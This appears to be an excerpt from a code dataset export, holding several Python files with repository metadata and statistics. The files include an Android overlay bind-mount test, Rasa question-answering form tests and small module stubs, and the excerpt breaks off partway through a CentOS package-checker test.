class MachopCommand(object): def shutdown(self): pass def cleanup(self): pass
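MachopCommand above is a bare lifecycle interface with no-op hooks; a hypothetical subclass (WatchCommand and its behavior are illustrative, not part of the module) shows how shutdown() and cleanup() are meant to be overridden:

    from machop.commands import MachopCommand

    class WatchCommand(MachopCommand):
        def __init__(self):
            self.active = True

        def shutdown(self):
            # stop accepting new work before teardown
            self.active = False

        def cleanup(self):
            # release resources held while the command was active
            print("watch command cleaned up")

    cmd = WatchCommand()
    cmd.shutdown()
    cmd.cleanup()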
10.6
28
0.575472
11
106
5.545455
0.727273
0.262295
0
0
0
0
0
0
0
0
0
0
0.339623
106
9
29
11.777778
0.871429
0
0
0.4
0
0
0
0
0
0
0
0
0
1
0.4
false
0.4
0
0
0.6
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
1
0
0
1
0
0
6
8e862dde8b0576bb91f6e2909e00353ca06c999e
222
py
Python
cleverly/agglomerative/__init__.py
rayandrews/clustering-algorithm
14336545b11e25d7259b9f3e9314ea4a36674cc2
[ "MIT" ]
1
2021-11-03T21:14:08.000Z
2021-11-03T21:14:08.000Z
cleverly/agglomerative/__init__.py
rayandrews/cleverly
14336545b11e25d7259b9f3e9314ea4a36674cc2
[ "MIT" ]
null
null
null
cleverly/agglomerative/__init__.py
rayandrews/cleverly
14336545b11e25d7259b9f3e9314ea4a36674cc2
[ "MIT" ]
null
null
null
# from .Agglomerative import Agglomerative # from .linkage import average, average_group, complete, single # __all__ = [ # 'Agglomerative', # 'average', # 'average_group', # 'complete', # 'single' # ]
20.181818
63
0.635135
19
222
7.105263
0.473684
0.207407
0.281481
0.4
0.488889
0
0
0
0
0
0
0
0.225225
222
10
64
22.2
0.784884
0.90991
0
null
0
null
0
0
null
0
0
0
null
1
null
true
0
0
null
null
null
1
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
6
8e93cf78056143ebad2ee79e366db2acb62faee8
9,975
py
Python
build/sandbox/overlay_test.py
TinkerBoard2-Android/tools-treble
4a70b7b8a10119fe886bb009c634646a533f7db0
[ "Apache-2.0" ]
1
2022-02-10T21:17:20.000Z
2022-02-10T21:17:20.000Z
build/sandbox/overlay_test.py
TinkerBoard2-Android/tools-treble
4a70b7b8a10119fe886bb009c634646a533f7db0
[ "Apache-2.0" ]
null
null
null
build/sandbox/overlay_test.py
TinkerBoard2-Android/tools-treble
4a70b7b8a10119fe886bb009c634646a533f7db0
[ "Apache-2.0" ]
null
null
null
# Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Test overlay.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import os import shutil import subprocess import tempfile import unittest from . import overlay import re class BindOverlayTest(unittest.TestCase): def setUp(self): self.source_dir = tempfile.mkdtemp() self.destination_dir = tempfile.mkdtemp() os.mkdir(os.path.join(self.source_dir, 'base_dir')) os.mkdir(os.path.join(self.source_dir, 'base_dir', 'base_project')) os.mkdir(os.path.join(self.source_dir, 'base_dir', 'base_project', '.git')) os.mkdir(os.path.join(self.source_dir, 'overlays')) os.mkdir(os.path.join(self.source_dir, 'overlays', 'unittest1')) os.mkdir(os.path.join(self.source_dir, 'overlays', 'unittest1', 'from_dir')) os.mkdir(os.path.join(self.source_dir, 'overlays', 'unittest1', 'from_dir', '.git')) os.mkdir(os.path.join(self.source_dir, 'overlays', 'unittest1', 'upper_subdir')) os.mkdir(os.path.join(self.source_dir, 'overlays', 'unittest1', 'upper_subdir', 'lower_subdir')) os.mkdir(os.path.join(self.source_dir, 'overlays', 'unittest1', 'upper_subdir', 'lower_subdir', 'from_unittest1')) os.mkdir(os.path.join(self.source_dir, 'overlays', 'unittest1', 'upper_subdir', 'lower_subdir', 'from_unittest1', '.git')) os.symlink( os.path.join(self.source_dir, 'overlays', 'unittest1', 'upper_subdir', 'lower_subdir'), os.path.join(self.source_dir, 'overlays', 'unittest1', 'upper_subdir', 'subdir_symlink') ) open(os.path.join(self.source_dir, 'overlays', 'unittest1', 'from_file'), 'a').close() os.mkdir(os.path.join(self.source_dir, 'overlays', 'unittest2')) os.mkdir(os.path.join(self.source_dir, 'overlays', 'unittest2', 'upper_subdir')) os.mkdir(os.path.join(self.source_dir, 'overlays', 'unittest2', 'upper_subdir', 'lower_subdir')) os.mkdir(os.path.join(self.source_dir, 'overlays', 'unittest2', 'upper_subdir', 'lower_subdir', 'from_unittest2')) os.mkdir(os.path.join(self.source_dir, 'overlays', 'unittest2', 'upper_subdir', 'lower_subdir', 'from_unittest2', '.git')) def tearDown(self): shutil.rmtree(self.source_dir) def testValidTargetOverlayBinds(self): with tempfile.NamedTemporaryFile('w+t') as test_config: test_config.write( '<?xml version="1.0" encoding="UTF-8" ?>' '<config>' ' <target name="unittest">' ' <overlay name="unittest1"/>' ' </target>' '</config>' ) test_config.flush() o = overlay.BindOverlay( config_file=test_config.name, target='unittest', source_dir=self.source_dir) self.assertIsNotNone(o) bind_mounts = o.GetBindMounts() bind_source = os.path.join(self.source_dir, 'overlays/unittest1/from_dir') bind_destination = os.path.join(self.source_dir, 'from_dir') self.assertEqual(bind_mounts[bind_destination], overlay.BindMount(bind_source, False)) def testMultipleOverlays(self): with tempfile.NamedTemporaryFile('w+t') as test_config: test_config.write( '<?xml version="1.0" encoding="UTF-8" ?>' '<config>' ' <target name="unittest">' ' <overlay name="unittest1"/>' ' <overlay name="unittest2"/>' ' 
</target>' '</config>' ) test_config.flush() o = overlay.BindOverlay( config_file=test_config.name, target='unittest', source_dir=self.source_dir) self.assertIsNotNone(o) bind_mounts = o.GetBindMounts() bind_source = os.path.join(self.source_dir, 'overlays/unittest1/upper_subdir/lower_subdir/from_unittest1') bind_destination = os.path.join(self.source_dir, 'upper_subdir/lower_subdir/from_unittest1') self.assertEqual(bind_mounts[bind_destination], overlay.BindMount(bind_source, False)) bind_source = os.path.join(self.source_dir, 'overlays/unittest2/upper_subdir/lower_subdir/from_unittest2') bind_destination = os.path.join(self.source_dir, 'upper_subdir/lower_subdir/from_unittest2') self.assertEqual(bind_mounts[bind_destination], overlay.BindMount(bind_source, False)) def testMultipleOverlaysWithWhitelist(self): with tempfile.NamedTemporaryFile('w+t') as test_config: test_config.write( '<?xml version="1.0" encoding="UTF-8" ?>' '<config>' ' <target name="unittest">' ' <overlay name="unittest1"/>' ' <overlay name="unittest2"/>' ' </target>' '</config>' ) test_config.flush() rw_whitelist = {'overlays/unittest1/upper_subdir/lower_subdir/from_unittest1'} o = overlay.BindOverlay( config_file=test_config.name, target='unittest', source_dir=self.source_dir) self.assertIsNotNone(o) bind_mounts = o.GetBindMounts() bind_source = os.path.join(self.source_dir, 'overlays/unittest1/upper_subdir/lower_subdir/from_unittest1') bind_destination = os.path.join(self.source_dir, 'upper_subdir/lower_subdir/from_unittest1') self.assertEqual( bind_mounts[bind_destination], overlay.BindMount(source_dir=bind_source, readonly=False)) bind_source = os.path.join(self.source_dir, 'overlays/unittest2/upper_subdir/lower_subdir/from_unittest2') bind_destination = os.path.join(self.source_dir, 'upper_subdir/lower_subdir/from_unittest2') self.assertEqual(bind_mounts[bind_destination], overlay.BindMount(bind_source, False)) def testValidOverlaidDir(self): with tempfile.NamedTemporaryFile('w+t') as test_config: test_config.write( '<?xml version="1.0" encoding="UTF-8" ?>' '<config>' ' <target name="unittest">' ' <overlay name="unittest1"/>' ' </target>' '</config>' ) test_config.flush() o = overlay.BindOverlay( config_file=test_config.name, target='unittest', source_dir=self.source_dir, destination_dir=self.destination_dir) self.assertIsNotNone(o) bind_mounts = o.GetBindMounts() bind_source = os.path.join(self.source_dir, 'overlays/unittest1/from_dir') bind_destination = os.path.join(self.destination_dir, 'from_dir') self.assertEqual(bind_mounts[bind_destination], overlay.BindMount(bind_source, False)) def testValidFilesystemViewDirectoryBind(self): with tempfile.NamedTemporaryFile('w+t') as test_config: test_config.write( '<?xml version="1.0" encoding="UTF-8" ?>' '<config>' ' <target name="unittest">' ' <view name="unittestview"/>' ' </target>' ' <view name="unittestview">' ' <path source="overlays/unittest1/from_dir" ' ' destination="to_dir"/>' ' </view>' '</config>' ) test_config.flush() o = overlay.BindOverlay( config_file=test_config.name, target='unittest', source_dir=self.source_dir) self.assertIsNotNone(o) bind_mounts = o.GetBindMounts() bind_source = os.path.join(self.source_dir, 'overlays/unittest1/from_dir') bind_destination = os.path.join(self.source_dir, 'to_dir') self.assertEqual(bind_mounts[bind_destination], overlay.BindMount(bind_source, False)) def testValidFilesystemViewFileBind(self): with tempfile.NamedTemporaryFile('w+t') as test_config: test_config.write( '<?xml version="1.0" encoding="UTF-8" ?>' 
'<config>' ' <target name="unittest">' ' <view name="unittestview"/>' ' </target>' ' <view name="unittestview">' ' <path source="overlays/unittest1/from_file" ' ' destination="to_file"/>' ' </view>' '</config>' ) test_config.flush() o = overlay.BindOverlay( config_file=test_config.name, target='unittest', source_dir=self.source_dir) self.assertIsNotNone(o) bind_mounts = o.GetBindMounts() bind_source = os.path.join(self.source_dir, 'overlays/unittest1/from_file') bind_destination = os.path.join(self.source_dir, 'to_file') self.assertEqual(bind_mounts[bind_destination], overlay.BindMount(bind_source, False)) def testInvalidTarget(self): with tempfile.NamedTemporaryFile('w+t') as test_config: test_config.write( '<?xml version="1.0" encoding="UTF-8" ?>' '<config>' ' <target name="unittest">' ' <overlay name="unittest1"/>' ' </target>' '</config>' ) test_config.flush() with self.assertRaises(KeyError): overlay.BindOverlay( config_file=test_config.name, target='unknown', source_dir=self.source_dir) if __name__ == '__main__': unittest.main()
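Distilled from the tests above, a hedged usage sketch: create an overlay tree, write a target config, and ask BindOverlay for its computed bind mounts. The directory layout mirrors setUp() (a .git directory marks a project the overlay engine mounts), and the bare `import overlay` assumes build/sandbox is on sys.path:

    import os
    import tempfile

    import overlay  # assumes build/sandbox is importable

    source_dir = tempfile.mkdtemp()
    os.makedirs(os.path.join(source_dir, 'overlays', 'unittest1', 'from_dir', '.git'))

    with tempfile.NamedTemporaryFile('w+t') as cfg:
        cfg.write('<?xml version="1.0" encoding="UTF-8" ?>'
                  '<config>'
                  '  <target name="unittest">'
                  '    <overlay name="unittest1"/>'
                  '  </target>'
                  '</config>')
        cfg.flush()
        o = overlay.BindOverlay(config_file=cfg.name,
                                target='unittest',
                                source_dir=source_dir)
        for destination, mount in o.GetBindMounts().items():
            print(destination, '->', mount)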
39.426877
96
0.626767
1,125
9,975
5.354667
0.129778
0.076195
0.092795
0.081341
0.800631
0.791999
0.791999
0.791999
0.784031
0.777058
0
0.009905
0.240902
9,975
252
97
39.583333
0.785658
0.056441
0
0.684685
0
0
0.261763
0.077177
0
0
0
0
0.067568
1
0.040541
false
0
0.045045
0
0.09009
0.004505
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
8e9b411cad2e535c9b32761377b543e387000be4
15,416
py
Python
action-server/tests/actions/test_question_answering_form.py
dialoguemd/covidflow
b159b76dc68462f272614db4cbf716844872ebca
[ "MIT" ]
7
2020-05-23T07:07:26.000Z
2021-11-29T05:58:51.000Z
action-server/tests/actions/test_question_answering_form.py
dialoguemd/covidflow
b159b76dc68462f272614db4cbf716844872ebca
[ "MIT" ]
210
2020-04-13T17:21:55.000Z
2021-04-20T15:46:26.000Z
action-server/tests/actions/test_question_answering_form.py
dialoguemd/covidflow
b159b76dc68462f272614db4cbf716844872ebca
[ "MIT" ]
3
2020-04-09T14:38:09.000Z
2020-07-29T15:06:11.000Z
from unittest.mock import MagicMock, patch from rasa_sdk.events import ActionExecuted, Form, SlotSet, UserUttered from rasa_sdk.forms import REQUESTED_SLOT from covidflow.actions.answers import QuestionAnsweringResponse, QuestionAnsweringStatus from covidflow.actions.question_answering_form import ( ANSWERS_KEY, ANSWERS_SLOT, ASKED_QUESTION_SLOT, FEEDBACK_KEY, FEEDBACK_NOT_GIVEN, FEEDBACK_SLOT, FORM_NAME, QUESTION_KEY, QUESTION_SLOT, SKIP_QA_INTRO_SLOT, STATUS_KEY, STATUS_SLOT, QuestionAnsweringForm, ) from .form_test_helper import FormTestCase def QuestionAnsweringResponseMock(*args, **kwargs): mock = MagicMock(*args, **kwargs) async def mock_coroutine(*args, **kwargs): return mock(*args, **kwargs) mock_coroutine.mock = mock return mock_coroutine DOMAIN = {"responses": {"utter_ask_feedback_error": [{"text": ""}],}} QUESTION = "What is covid?" ANSWERS = [ "It's a virus!", "It's the greatest plea since the plague!", "No, it's SU-PER BAD!", ] SUCCESS_RESULT = QuestionAnsweringResponse( answers=ANSWERS, status=QuestionAnsweringStatus.SUCCESS ) FAILURE_RESULT = QuestionAnsweringResponse(status=QuestionAnsweringStatus.FAILURE) OUT_OF_DISTRIBUTION_RESULT = QuestionAnsweringResponse( status=QuestionAnsweringStatus.OUT_OF_DISTRIBUTION ) NEED_ASSESSMENT_RESULT = QuestionAnsweringResponse( status=QuestionAnsweringStatus.NEED_ASSESSMENT ) FULL_RESULT_SUCCESS = { QUESTION_KEY: QUESTION, ANSWERS_KEY: ANSWERS, STATUS_KEY: QuestionAnsweringStatus.SUCCESS, FEEDBACK_KEY: True, } class TestQuestionAnsweringForm(FormTestCase): def setUp(self): super().setUp() self.form = QuestionAnsweringForm() def test_form_activation_first_time_without_qa_samples(self): tracker = self.create_tracker(active_form=False, intent="ask_question") self.run_form(tracker, DOMAIN) self.assert_events( [ Form(FORM_NAME), SlotSet(SKIP_QA_INTRO_SLOT, True), SlotSet(REQUESTED_SLOT, QUESTION_SLOT), ] ) self.assert_templates( [ "utter_can_help_with_questions", "utter_qa_disclaimer", "utter_ask_active_question", ] ) def test_form_activation_first_time_with_qa_samples(self): tracker = self.create_tracker(active_form=False, intent="ask_question") self.run_form( tracker, domain={"responses": {"utter_qa_sample_foo": [{"text": "bar"}]}} ) self.assert_events( [ Form(FORM_NAME), SlotSet(SKIP_QA_INTRO_SLOT, True), SlotSet(REQUESTED_SLOT, QUESTION_SLOT), ] ) self.assert_templates( [ "utter_can_help_with_questions", "utter_qa_disclaimer", "utter_qa_sample", "utter_ask_active_question", ] ) def test_form_activation_not_first_time(self): tracker = self.create_tracker( slots={ASKED_QUESTION_SLOT: FULL_RESULT_SUCCESS, SKIP_QA_INTRO_SLOT: True}, active_form=False, intent="ask_question", ) self.run_form(tracker, DOMAIN) self.assert_events([Form(FORM_NAME), SlotSet(REQUESTED_SLOT, QUESTION_SLOT)]) self.assert_templates(["utter_ask_active_question"]) def test_form_activation_affirm(self): tracker = self.create_tracker( slots={ASKED_QUESTION_SLOT: FULL_RESULT_SUCCESS}, active_form=False, intent="affirm", text="What is covid?", ) self.run_form(tracker, DOMAIN) self.assert_events([Form(FORM_NAME), SlotSet(REQUESTED_SLOT, QUESTION_SLOT)]) self.assert_templates(["utter_ask_active_question"]) def test_form_activation_fallback(self): tracker = self.create_tracker( slots={ASKED_QUESTION_SLOT: FULL_RESULT_SUCCESS, SKIP_QA_INTRO_SLOT: True}, active_form=False, intent="affirm", ) self.run_form(tracker, DOMAIN) self.assert_events([Form(FORM_NAME), SlotSet(REQUESTED_SLOT, QUESTION_SLOT)]) self.assert_templates(["utter_ask_active_question"]) 
@patch("covidflow.actions.question_answering_form.QuestionAnsweringProtocol") def test_provide_question_success(self, mock_protocol): mock_protocol.return_value.get_response = QuestionAnsweringResponseMock( return_value=SUCCESS_RESULT ) tracker = self.create_tracker( slots={REQUESTED_SLOT: QUESTION_SLOT}, text=QUESTION ) self.run_form(tracker, DOMAIN) self.assert_events( [ SlotSet(QUESTION_SLOT, QUESTION), SlotSet(STATUS_SLOT, QuestionAnsweringStatus.SUCCESS), SlotSet(ANSWERS_SLOT, ANSWERS), SlotSet(REQUESTED_SLOT, FEEDBACK_SLOT), ] ) self.assert_templates([None, "utter_ask_feedback"]) self.assert_texts([ANSWERS[0], None]) @patch("covidflow.actions.question_answering_form.QuestionAnsweringProtocol") def test_provide_question_failure(self, mock_protocol): mock_protocol.return_value.get_response = QuestionAnsweringResponseMock( return_value=FAILURE_RESULT ) tracker = self.create_tracker( slots={REQUESTED_SLOT: QUESTION_SLOT}, text=QUESTION ) self.run_form(tracker, DOMAIN) self.assert_events( [ SlotSet(QUESTION_SLOT, QUESTION), SlotSet(STATUS_SLOT, QuestionAnsweringStatus.FAILURE), SlotSet(ANSWERS_SLOT, None), SlotSet(QUESTION_SLOT, None), SlotSet(FEEDBACK_SLOT, None), SlotSet( ASKED_QUESTION_SLOT, { QUESTION_KEY: QUESTION, STATUS_KEY: QuestionAnsweringStatus.FAILURE, ANSWERS_KEY: None, FEEDBACK_KEY: None, }, ), Form(None), SlotSet(REQUESTED_SLOT, None), ] ) self.assert_templates([]) @patch("covidflow.actions.question_answering_form.QuestionAnsweringProtocol") def test_provide_question_out_of_distribution(self, mock_protocol): mock_protocol.return_value.get_response = QuestionAnsweringResponseMock( return_value=OUT_OF_DISTRIBUTION_RESULT ) tracker = self.create_tracker( slots={REQUESTED_SLOT: QUESTION_SLOT}, text=QUESTION ) self.run_form(tracker, DOMAIN) self.assert_events( [ SlotSet(QUESTION_SLOT, QUESTION), SlotSet(STATUS_SLOT, QuestionAnsweringStatus.OUT_OF_DISTRIBUTION), SlotSet(ANSWERS_SLOT, None), SlotSet(QUESTION_SLOT, None), SlotSet(FEEDBACK_SLOT, None), SlotSet( ASKED_QUESTION_SLOT, { QUESTION_KEY: QUESTION, STATUS_KEY: QuestionAnsweringStatus.OUT_OF_DISTRIBUTION, ANSWERS_KEY: None, FEEDBACK_KEY: None, }, ), Form(None), SlotSet(REQUESTED_SLOT, None), ] ) self.assert_templates([]) def test_provide_feedback_affirm(self): tracker = self.create_tracker( slots={ REQUESTED_SLOT: FEEDBACK_SLOT, QUESTION_SLOT: QUESTION, ANSWERS_SLOT: ANSWERS, STATUS_SLOT: QuestionAnsweringStatus.SUCCESS, }, intent="affirm", ) self.run_form(tracker, DOMAIN) self.assert_events( [ SlotSet(FEEDBACK_SLOT, True), SlotSet(QUESTION_SLOT, None), SlotSet(FEEDBACK_SLOT, None), SlotSet(ASKED_QUESTION_SLOT, FULL_RESULT_SUCCESS), Form(None), SlotSet(REQUESTED_SLOT, None), ] ) self.assert_templates([]) def test_provide_feedback_deny(self): tracker = self.create_tracker( slots={ REQUESTED_SLOT: FEEDBACK_SLOT, QUESTION_SLOT: QUESTION, ANSWERS_SLOT: ANSWERS, STATUS_SLOT: QuestionAnsweringStatus.SUCCESS, }, intent="deny", ) self.run_form(tracker, DOMAIN) self.assert_events( [ SlotSet(FEEDBACK_SLOT, False), SlotSet(QUESTION_SLOT, None), SlotSet(FEEDBACK_SLOT, None), SlotSet( ASKED_QUESTION_SLOT, {**FULL_RESULT_SUCCESS, FEEDBACK_KEY: False} ), Form(None), SlotSet(REQUESTED_SLOT, None), ] ) self.assert_templates(["utter_post_feedback"]) def test_provide_feedback_not_given(self): tracker = self.create_tracker( slots={ REQUESTED_SLOT: FEEDBACK_SLOT, QUESTION_SLOT: QUESTION, ANSWERS_SLOT: ANSWERS, STATUS_SLOT: QuestionAnsweringStatus.SUCCESS, }, text="some text with", intent="another_intent", entities=[{"and": "entities"}], ) 
self.run_form(tracker, DOMAIN) self.assert_events( [ SlotSet(FEEDBACK_SLOT, FEEDBACK_NOT_GIVEN), SlotSet(QUESTION_SLOT, None), SlotSet(FEEDBACK_SLOT, None), SlotSet( ASKED_QUESTION_SLOT, {**FULL_RESULT_SUCCESS, FEEDBACK_KEY: FEEDBACK_NOT_GIVEN}, ), Form(None), SlotSet(REQUESTED_SLOT, None), ActionExecuted("utter_ask_another_question"), ActionExecuted("action_listen"), UserUttered( "some text with", parse_data={ "text": "some text with", "intent": {"name": "another_intent"}, "intent_ranking": [], "entities": [{"and": "entities"}], }, ), Form(None), SlotSet(REQUESTED_SLOT, None), ] ) self.assert_templates([]) @patch("covidflow.actions.question_answering_form.QuestionAnsweringProtocol") def test_fallback_question_success(self, mock_protocol): mock_protocol.return_value.get_response = QuestionAnsweringResponseMock( return_value=SUCCESS_RESULT ) tracker = self.create_tracker( active_form=False, intent="fallback", text=QUESTION ) self.run_form(tracker, DOMAIN) self.assert_events( [ Form(FORM_NAME), SlotSet(QUESTION_SLOT, QUESTION), SlotSet(STATUS_SLOT, QuestionAnsweringStatus.SUCCESS), SlotSet(ANSWERS_SLOT, ANSWERS), SlotSet(REQUESTED_SLOT, FEEDBACK_SLOT), ] ) self.assert_templates([None, "utter_ask_feedback"]) self.assert_texts([ANSWERS[0], None]) @patch("covidflow.actions.question_answering_form.QuestionAnsweringProtocol") def test_fallback_question_failure(self, mock_protocol): mock_protocol.return_value.get_response = QuestionAnsweringResponseMock( return_value=FAILURE_RESULT ) tracker = self.create_tracker( active_form=False, intent="fallback", text=QUESTION ) self.run_form(tracker, DOMAIN) self.assert_events( [ Form(FORM_NAME), SlotSet(QUESTION_SLOT, QUESTION), SlotSet(STATUS_SLOT, QuestionAnsweringStatus.FAILURE), SlotSet(ANSWERS_SLOT, None), SlotSet(QUESTION_SLOT, None), SlotSet(FEEDBACK_SLOT, None), SlotSet( ASKED_QUESTION_SLOT, { QUESTION_KEY: QUESTION, STATUS_KEY: QuestionAnsweringStatus.FAILURE, ANSWERS_KEY: None, FEEDBACK_KEY: None, }, ), Form(None), SlotSet(REQUESTED_SLOT, None), ] ) self.assert_templates([]) @patch("covidflow.actions.question_answering_form.QuestionAnsweringProtocol") def test_fallback_question_out_of_distribution(self, mock_protocol): mock_protocol.return_value.get_response = QuestionAnsweringResponseMock( return_value=OUT_OF_DISTRIBUTION_RESULT ) tracker = self.create_tracker( active_form=False, intent="fallback", text=QUESTION ) self.run_form(tracker, DOMAIN) self.assert_events( [ Form(FORM_NAME), SlotSet(QUESTION_SLOT, QUESTION), SlotSet(STATUS_SLOT, QuestionAnsweringStatus.OUT_OF_DISTRIBUTION), SlotSet(ANSWERS_SLOT, None), SlotSet(QUESTION_SLOT, None), SlotSet(FEEDBACK_SLOT, None), SlotSet( ASKED_QUESTION_SLOT, { QUESTION_KEY: QUESTION, STATUS_KEY: QuestionAnsweringStatus.OUT_OF_DISTRIBUTION, ANSWERS_KEY: None, FEEDBACK_KEY: None, }, ), Form(None), SlotSet(REQUESTED_SLOT, None), ] ) self.assert_templates([]) @patch("covidflow.actions.question_answering_form.QuestionAnsweringProtocol") def test_fallback_question_need_assessment(self, mock_protocol): mock_protocol.return_value.get_response = QuestionAnsweringResponseMock( return_value=NEED_ASSESSMENT_RESULT ) tracker = self.create_tracker( active_form=False, intent="fallback", text=QUESTION ) self.run_form(tracker, DOMAIN) self.assert_events( [ Form(FORM_NAME), SlotSet(QUESTION_SLOT, QUESTION), SlotSet(STATUS_SLOT, QuestionAnsweringStatus.NEED_ASSESSMENT), SlotSet(ANSWERS_SLOT, None), SlotSet(QUESTION_SLOT, None), SlotSet(FEEDBACK_SLOT, None), SlotSet( ASKED_QUESTION_SLOT, { QUESTION_KEY: QUESTION, STATUS_KEY: 
QuestionAnsweringStatus.NEED_ASSESSMENT, ANSWERS_KEY: None, FEEDBACK_KEY: None, }, ), Form(None), SlotSet(REQUESTED_SLOT, None), ] ) self.assert_templates([])
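The QuestionAnsweringResponseMock helper at the top of this file wraps a MagicMock in a coroutine so the code under test can await it while the test still inspects calls through the .mock attribute. A standalone, stdlib-only demonstration of the same pattern (coroutine_mock is an illustrative name):

    import asyncio
    from unittest.mock import MagicMock

    def coroutine_mock(*args, **kwargs):
        mock = MagicMock(*args, **kwargs)

        async def wrapper(*a, **kw):
            return mock(*a, **kw)

        wrapper.mock = mock  # expose the inner mock for assertions
        return wrapper

    get_response = coroutine_mock(return_value="It's a virus!")
    answer = asyncio.run(get_response("What is covid?"))
    assert answer == "It's a virus!"
    get_response.mock.assert_called_once_with("What is covid?")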
32.116667
88
0.572782
1,349
15,416
6.203113
0.092661
0.055927
0.037643
0.043021
0.806883
0.788838
0.780354
0.77892
0.76924
0.763145
0
0.000198
0.34568
15,416
479
89
32.183716
0.829384
0
0
0.565657
0
0
0.077193
0.045537
0
0
0
0
0.080808
1
0.042929
false
0
0.015152
0
0.065657
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
8ea831799aea2aeef5fc8f77fd4d7ab78df0e408
46
py
Python
mflops/__init__.py
shuncyu/mflops
81fddf9407bcbdca02b9c57f6b03640b3fb94101
[ "MIT" ]
1
2020-12-17T03:09:20.000Z
2020-12-17T03:09:20.000Z
mflops/__init__.py
shuncyu/mflops
81fddf9407bcbdca02b9c57f6b03640b3fb94101
[ "MIT" ]
null
null
null
mflops/__init__.py
shuncyu/mflops
81fddf9407bcbdca02b9c57f6b03640b3fb94101
[ "MIT" ]
null
null
null
from .model_info import get_model_compute_info
46
46
0.913043
8
46
4.75
0.75
0
0
0
0
0
0
0
0
0
0
0
0.065217
46
1
46
46
0.883721
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
8ed785f9ecac41cc4671b1c00a6044aaca380a37
31
py
Python
aiotuyalan/lib/__init__.py
zachcheatham/aiotuyalan
cc07703509ae4b618995668d59e0624904c9a75f
[ "MIT" ]
null
null
null
aiotuyalan/lib/__init__.py
zachcheatham/aiotuyalan
cc07703509ae4b618995668d59e0624904c9a75f
[ "MIT" ]
null
null
null
aiotuyalan/lib/__init__.py
zachcheatham/aiotuyalan
cc07703509ae4b618995668d59e0624904c9a75f
[ "MIT" ]
null
null
null
from .client import TuyaClient
15.5
30
0.83871
4
31
6.5
1
0
0
0
0
0
0
0
0
0
0
0
0.129032
31
1
31
31
0.962963
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
8ef2f5a9f4f1a846fe1bc7ce7c66cfad8a5a8285
23
py
Python
vogue/commands/load/__init__.py
mayabrandi/vogue
463e6417a9168eadb0d11dea2d0f97919494bcd3
[ "MIT" ]
111
2015-01-15T11:53:20.000Z
2022-03-26T19:55:24.000Z
vogue/commands/load/__init__.py
mayabrandi/vogue
463e6417a9168eadb0d11dea2d0f97919494bcd3
[ "MIT" ]
2,995
2015-01-15T16:14:20.000Z
2022-03-31T13:36:32.000Z
vogue/commands/load/__init__.py
mayabrandi/vogue
463e6417a9168eadb0d11dea2d0f97919494bcd3
[ "MIT" ]
55
2015-05-31T19:09:49.000Z
2021-11-01T10:50:31.000Z
from .base import load
11.5
22
0.782609
4
23
4.5
1
0
0
0
0
0
0
0
0
0
0
0
0.173913
23
1
23
23
0.947368
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
d932b4c968ef33aec273d7a41dbca435dc81e22a
14,460
py
Python
tests/test_package_checker.py
jsoref/centos-package-cron
0c7e3e24b91619916a515c8ef492dcfa863dae66
[ "BSD-2-Clause" ]
83
2015-03-19T09:07:57.000Z
2021-10-14T02:19:58.000Z
tests/test_package_checker.py
jsoref/centos-package-cron
0c7e3e24b91619916a515c8ef492dcfa863dae66
[ "BSD-2-Clause" ]
26
2015-01-08T17:29:10.000Z
2020-03-04T19:56:19.000Z
tests/test_package_checker.py
jsoref/centos-package-cron
0c7e3e24b91619916a515c8ef492dcfa863dae66
[ "BSD-2-Clause" ]
21
2016-05-17T19:22:56.000Z
2021-02-15T14:27:08.000Z
#!/usr/bin/python import unittest import sys from centos_package_cron import package_checker from centos_package_cron import package_fetcher from centos_package_cron import errata_fetcher from centos_package_cron.errata_fetcher import ErrataType from centos_package_cron.errata_fetcher import ErrataSeverity from mock import Mock from centos_package_cron.package import Package class PackageCheckerTest(unittest.TestCase): def testAdvisoryPackageMeantForCurrentOsCentOs5(self): # arrange os_fetcher = Mock() os_fetcher.get_top_level_version = Mock(return_value='5') errata = Mock() pkg = Mock() checker = package_checker.PackageChecker(errata,pkg,os_fetcher) advisory_packages = [{'name': 'xen-libs','version':'3.0.3', 'release':'135.el4.2', 'arch':'x86_64'}, {'name': 'xen-libs','version':'3.0.3', 'release':'135.el5.2', 'arch':'x86_64'}] # act result = list(map(lambda a: checker._advisoryPackageMeantForCurrentOs(a), advisory_packages)) # assert assert result == [False, True] def testAdvisoryPackageMeantForCurrentOsCentOs_AllVersions(self): # arrange os_fetcher = Mock() os_fetcher.get_top_level_version = Mock(return_value='6') errata = Mock() pkg = Mock() checker = package_checker.PackageChecker(errata,pkg,os_fetcher) advisory_packages = [{'name': 'xen-libs','version':'3.0.3', 'release':'135.el4.2', 'arch':'x86_64'}, {'name': 'kernel', 'version':'2.6.32', 'release':'642.13.1.el6', 'arch':'i686'}, {'name': 'xen-libs','version':'3.0.3', 'release':'135.el6.2', 'arch':'x86_64'}] # act result = list(map(lambda a: 